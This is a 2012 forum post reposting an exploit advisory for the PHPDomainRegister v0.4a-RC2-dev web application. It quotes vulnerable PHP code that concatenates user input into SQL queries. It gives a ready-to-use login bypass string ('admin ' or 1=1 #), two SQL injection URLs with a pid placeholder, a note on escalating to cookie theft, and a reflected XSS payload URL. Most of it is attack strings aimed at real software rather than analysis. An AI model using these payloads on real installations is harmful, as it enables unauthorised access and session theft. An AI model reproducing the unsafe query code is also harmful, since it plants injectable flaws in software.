The_Arhitect
Posted January 16, 2012

PHPDomainRegister v0.4a-RC2-dev Multiple Vulnerabilities

Title = PHPDomainRegister v0.4a-RC2-dev => [SQL Auth][SQL Inject][XSS]
Author = Or4nG.M4n
Download = http://garr.dl.sourceforge.net/project/phpdr/v0.4b%20-%20RC2.rar
This Bug Powered By : GooGLe
Thanks :
+----------------------------------+
| xSs m4n i-Hmx Cyber-Crystal      |
| Dr.Bnned ahwak2000 sa^Dev!L      |
+----------------------------------+

SQL Auth Bypass
vuln : class_AjaxLogin.php line 73

    function is_login() {
        include ('../config.php');
        if(isset($_POST['username'])) {
            $_SESSION['username'] = $_POST['username'];
            $password = $_POST['password'];
            $strSQL =
                "SELECT * FROM `".$_SQL_PREFIX . $USER_Table_Name."` WHERE `LOGIN_NAME` = '".$_SESSION['username']."' AND password = md5('".$password."');";
            $result = mysql_query ($strSQL);
            $row = mysql_fetch_row($result);
            $exist = count($row);
            if($exist >=2) { $this->jscript_location(); }

[jscript_location]

    function jscript_location() {
        $this->set_session();
        echo "<script> $('#container').fadeOut();window.location.href='".SUCCESS_LOGIN_GOTO."'</script>";

How I can exploit this bug :
just login as => admin ' or 1=1 #

SQL injection
vuln
admin/index.php line 212

    $sql = "SELECT name, price, disc, disc2, webspace FROM ".$_SQL_PREFIX."packages WHERE `id` = ".$_GET['pid'].";";
    $getpack = mysql_query($sql);

line 1079

    showPacket($pid);

vuln
index.php line 617

    $SQL = "SELECT * FROM ".$_SQL_PREFIX."packages where id = ".$_GET['pid']."";
    $result = mysql_query($SQL);

Exploit Here :
index.php?usetype=domainauswahl&pid=%injectionhere%&use=Details
admin/index.php?show=showPacket&pid=%injectionhere%

Sql to xss to get cookie

Cross Site Scripting
[xss]
admin/index.php?show=domains&do=delFirmadomains&domain=<script>alert(7);</script>

Source: PHPDomainRegister v0.4a-RC2-dev Multiple Vulnerabilities